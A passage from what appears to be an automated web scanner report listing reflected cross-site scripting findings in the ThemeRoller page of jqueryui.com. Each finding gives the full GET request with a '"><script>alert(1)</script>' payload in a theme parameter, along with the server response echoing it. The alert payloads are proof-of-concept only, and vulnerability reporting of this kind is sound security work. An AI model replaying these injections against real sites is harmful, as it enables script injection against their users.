55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.pngfe60a"><script>alert(1)</script>ce06652329f&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=
...[SNIP]...

3.33. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c40d0"><script>alert(1)</script>ec045cea2ed was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngc40d0"><script>alert(1)</script>ec045cea2ed&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngc40d0"><script>alert(1)</script>ec045cea2ed&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTex
...[SNIP]...

3.34. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d571"><script>alert(1)</script>b542d36e1a6 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png1d571"><script>alert(1)</script>b542d36e1a6&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
meroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png1d571"><script>alert(1)</script>b542d36e1a6&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666
...[SNIP]...

3.35. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb4d"><script>alert(1)</script>b1e44b09bce was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngabb4d"><script>alert(1)</script>b1e44b09bce&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngabb4d"><script>alert(1)</script>b1e44b09bce&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B
...[SNIP]...

3.36. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c782"><script>alert(1)</script>75def417c71 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png4c782"><script>alert(1)</script>75def417c71&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png4c782"><script>alert(1)</script>75def417c71&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC
...[SNIP]...

3.37. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7dc"><script>alert(1)</script>ced59be90ca was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pngac7dc"><script>alert(1)</script>ced59be90ca&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pngac7dc"><script>alert(1)</script>ced59be90ca&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerR
...[SNIP]...

3.38. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa510"><script>alert(1)</script>0bdc0f1fe04 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.pngaa510"><script>alert(1)</script>0bdc0f1fe04&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.pngaa510"><script>alert(1)</script>0bdc0f1fe04&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.39. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83abc"><script>alert(1)</script>c8f0c5f0c21 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC83abc"><script>alert(1)</script>c8f0c5f0c21&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ghlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC83abc"><script>alert(1)</script>c8f0c5f0c21&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000
...[SNIP]...

3.40. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2458c"><script>alert(1)</script>1e2146c3dca was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC2458c"><script>alert(1)</script>1e2146c3dca&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
light_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC2458c"><script>alert(1)</script>1e2146c3dca&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorH
...[SNIP]...

3.41. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de03"><script>alert(1)</script>591a2eed492 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF1de03"><script>alert(1)</script>591a2eed492&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&ic